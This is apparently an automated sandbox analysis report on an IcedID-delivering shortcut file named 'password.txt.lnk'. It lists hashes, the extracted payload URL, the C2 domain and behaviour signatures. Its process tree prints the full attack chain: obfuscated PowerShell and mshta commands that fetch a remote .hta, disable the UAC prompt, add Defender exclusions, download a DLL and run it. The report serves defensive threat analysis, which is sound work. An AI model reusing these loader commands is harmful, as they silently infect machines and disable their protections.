Analysis
- max time kernel: 1789s
- max time network: 1802s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 23-06-2022 16:06
Static task: static1
Behavioral task: behavioral1
Sample: password.txt.lnk
Resource: win7-20220414-en
General
- Target: password.txt.lnk
- Size: 1KB
- MD5: ee5dc8a66298685a6f6790e32e1a006b
- SHA1: 8bd4a8e15b8c097283b67dd8201ed41e01cbe794
- SHA256: 65e7327a6f3efb230a4d61966182f1d1c592aa222f4f820afaca6617680d09bd
- SHA512: 8c0164d4576959d7d474cd39545db1564e459f0ab55e51df601d132d6667b41e8751d236a3850934b0575ae9c1e09e230019609669276d36849da40400f0613c
Malware Config
Extracted:
- https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta
Extracted:
- icedid
- 3289900935
- ilzenhwery.com
Signatures
-
UAC bypass
Processes (description | ioc | process):
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | powershell.exe
-
suricata: ET MALWARE Win32/IcedID Request Cookie
-
Blocklisted process makes network request (5 IoCs)
Processes (flow | pid | process):
  5 | 1480 | mshta.exe
  9 | 1480 | mshta.exe
  13 | 1480 | mshta.exe
  17 | 4100 | powershell.exe
  23 | 1104 | rundll32.exe
-
Downloads MZ/PE file
-
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence.
Processes (description | ioc | process):
  Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | cmd.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | mshta.exe
-
Loads dropped DLL (1 IoC)
Processes (pid | process):
  1104 | rundll32.exe
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes (pid | process):
  876 | powershell.exe
  876 | powershell.exe
  4100 | powershell.exe
  4100 | powershell.exe
  1104 | rundll32.exe
  1104 | rundll32.exe
-
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes (description | pid | process):
  Token: SeDebugPrivilege | 876 | powershell.exe
  Token: SeDebugPrivilege | 4100 | powershell.exe
-
Suspicious use of WriteProcessMemory (8 IoCs)
Processes (description | pid | process | target process):
  PID 2100 wrote to memory of 876 | 2100 | cmd.exe | powershell.exe
  PID 2100 wrote to memory of 876 | 2100 | cmd.exe | powershell.exe
  PID 876 wrote to memory of 1480 | 876 | powershell.exe | mshta.exe
  PID 876 wrote to memory of 1480 | 876 | powershell.exe | mshta.exe
  PID 1480 wrote to memory of 4100 | 1480 | mshta.exe | powershell.exe
  PID 1480 wrote to memory of 4100 | 1480 | mshta.exe | powershell.exe
  PID 4100 wrote to memory of 1104 | 4100 | powershell.exe | rundll32.exe
  PID 4100 wrote to memory of 1104 | 4100 | powershell.exe | rundll32.exe
Processes (process tree; each entry is a child of the entry one level above it)
-
Level 1: C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\password.txt.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  -
  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $xrrCQEUf = [convert]::FromBase64String('PjIv');$rvIxkgme = [convert]::FromBase64String('GgQfAxZXHwMDBwRNWFgAFhkQWhMWAxZaBBQeEhkUElkUGBpYAAdaFBgZAxIZA1gDHxIaEgRYBBQWBxIEHxgDWBIDEgQDWR8DFg==');$BJtiaLic = -join($xrrCQEUf | % {[char] ($_ -bxor 0x77)});$uVgPreUS = -join ($rvIxkgme | % { [char] ($_ -bxor 0x77)});sal ABJmyxbD $BJtiaLic;ABJmyxbD $uVgPreUS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    -
    Level 3: C:\Windows\system32\mshta.exe
      Command line: "C:\Windows\system32\mshta.exe" https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta
      - Blocklisted process makes network request
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
      -
      Level 4: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function BpCExIjDrdGi($nnVDyzh, $cfMRXTCG){[IO.File]::WriteAllBytes($nnVDyzh, $cfMRXTCG)};function BgqJOAPBzie($nnVDyzh){if($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66896,66904,66904))) -eq $True){rundll32.exe $nnVDyzh ,RunObject }elseif($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66908,66911,66845))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $nnVDyzh}else{Start-Process $nnVDyzh}};function YDwYoXfkvCiX($BUsiXmWVUTyBGlhNN){$uTDDSkKDrMcCukgsB = New-Object (fibYakKGHnxcX @(66874,66897,66912,66842,66883,66897,66894,66863,66904,66901,66897,66906,66912));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cfMRXTCG = $uTDDSkKDrMcCukgsB.DownloadData($BUsiXmWVUTyBGlhNN);return $cfMRXTCG};function fibYakKGHnxcX($ZPSYkAbHDFF){$vRDpSXA=66796;$ifTikh=$Null;foreach($efauSZiRIFLSvo in $ZPSYkAbHDFF){$ifTikh+=[char]($efauSZiRIFLSvo-$vRDpSXA)};return $ifTikh};function KTcwOeFIaImkX(){$kyNirfktEagoeXnmMr = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$nGDxbpOvNNZvVHtpfa=$env:AppData; Add-MpPreference -ExclusionPath $nGDxbpOvNNZvVHtpfa;Add-MpPreference -ExclusionExtension ?lnk?;$PkAZgfWOTxnZ = $kyNirfktEagoeXnmMr + 'test.dll'; if (Test-Path -Path $PkAZgfWOTxnZ){BgqJOAPBzie $PkAZgfWOTxnZ;}Else{ $SpgGVjW = YDwYoXfkvCiX (fibYakKGHnxcX @(66900,66912,66912,66908,66911,66854,66843,66843,66915,66893,66906,66899,66841,66896,66893,66912,66893,66841,66911,66895,66901,66897,66906,66895,66897,66842,66895,66907,66905,66843,66915,66908,66841,66895,66907,66906,66912,66897,66906,66912,66843,66912,66900,66897,66905,66897,66911,66843,66911,66895,66893,66908,66897,66911,66900,66907,66912,66843,66912,66897,66911,66912,66842,66896,66904,66904));BpCExIjDrdGi $PkAZgfWOTxnZ $SpgGVjW;BgqJOAPBzie $PkAZgfWOTxnZ;};;;;}KTcwOeFIaImkX;"
        - UAC bypass
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        -
        Level 5: C:\Windows\system32\rundll32.exe
          Command line: "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\test.dll RunObject
          - Blocklisted process makes network request
          - Loads dropped DLL
          - Suspicious behavior: EnumeratesProcesses
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
  SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
  SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
  SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 75b4b2eecda41cec059c973abb1114c0
  SHA1: 11dadf4817ead21b0340ce529ee9bbd7f0422668
  SHA256: 5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134
  SHA512: 87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626
-
C:\Users\Admin\AppData\Roaming\test.dll
  Filesize: 858KB
  MD5: f0b052dad1a3605cd3e6d044cd315388
  SHA1: fe3d8f50b494f400bd47842d580343f38be6a04b
  SHA256: 4798655c9e1df924b92d224c53dce0e3e9028318a5fa6ee4e6bd9f0f32154cdd
  SHA512: c8ee79ae9739c1486f0a89039b69afa6057d34bf39d2be58187d265662066c052776627fa58aa519e98c072704437fc3eaa190923e351414ef9a149509ff716b
-
memory/876-134-0x00007FF8E7ED0000-0x00007FF8E8991000-memory.dmp
  Filesize: 10.8MB
-
memory/876-131-0x000001C235130000-0x000001C235152000-memory.dmp
  Filesize: 136KB
-
memory/876-130-0x0000000000000000-mapping.dmp
-
memory/1104-139-0x0000000000000000-mapping.dmp
-
memory/1104-143-0x0000000180000000-0x0000000180009000-memory.dmp
  Filesize: 36KB
-
memory/1480-132-0x0000000000000000-mapping.dmp
-
memory/4100-135-0x0000000000000000-mapping.dmp
-
memory/4100-138-0x00007FF8E6D40000-0x00007FF8E7801000-memory.dmp
  Filesize: 10.8MB
-
memory/4100-142-0x00007FF8E6D40000-0x00007FF8E7801000-memory.dmp
  Filesize: 10.8MB